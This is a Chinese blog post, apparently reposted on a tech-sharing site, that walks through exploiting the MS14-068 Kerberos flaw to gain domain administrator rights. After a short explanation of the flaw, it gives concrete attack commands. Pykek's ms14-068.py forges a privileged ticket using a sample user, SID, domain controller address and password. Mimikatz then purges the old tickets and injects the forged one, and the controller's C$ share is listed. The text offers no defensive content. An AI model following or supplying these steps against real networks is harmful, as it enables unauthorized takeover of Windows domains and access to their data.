标签：TGT 068 提权 while 票据 密钥 MS14 Ticket

0x00 漏洞原理

用户向密钥分发中心（Key Distribution Center即KDC）申请票证授予票证（Ticket-Granting Ticket即TGT）如果此时声明自己有域管理员权限，并且密钥分发中心没有做校验，那么此时密钥分发中心就会返回一张票据给TGT，TGT会给票据授予服务器（Ticket-granting Server即TGS）换发一个域管理员的服务票据（Service Ticket）从而触发漏洞。
换言之就是张三去跟售票员讲自己是VIP客户，售票员没有校验真实性导致给张三了一张VIP的票据。

0x01 生成高权限票据

使用pykek生成
file：https://github.com/mubix/pykek

example:ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

Python ms14-068.py -u while@rootkit.org -s S-1-5-21-3759881954-2993291187-3577547808-1616 -d 192.168.1.12 -p admin123

whoami /user #查看sid
net time /domain #获得域用户名即while

0x02 清除内部票据信息

使用mimikatz

#kerberos::purge#清除原先服务器内部的票据信息

0x03 导入伪造票据

#kerberos::ptc TGT_while@rootkit.org.ccache

如下所示：

此时可以尝试列出域控的C盘了。
dir \机器名\C$

标签：TGT,068,提权,while,票据,密钥,MS14,Ticket
来源： https://www.cnblogs.com/nul1/p/12831872.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。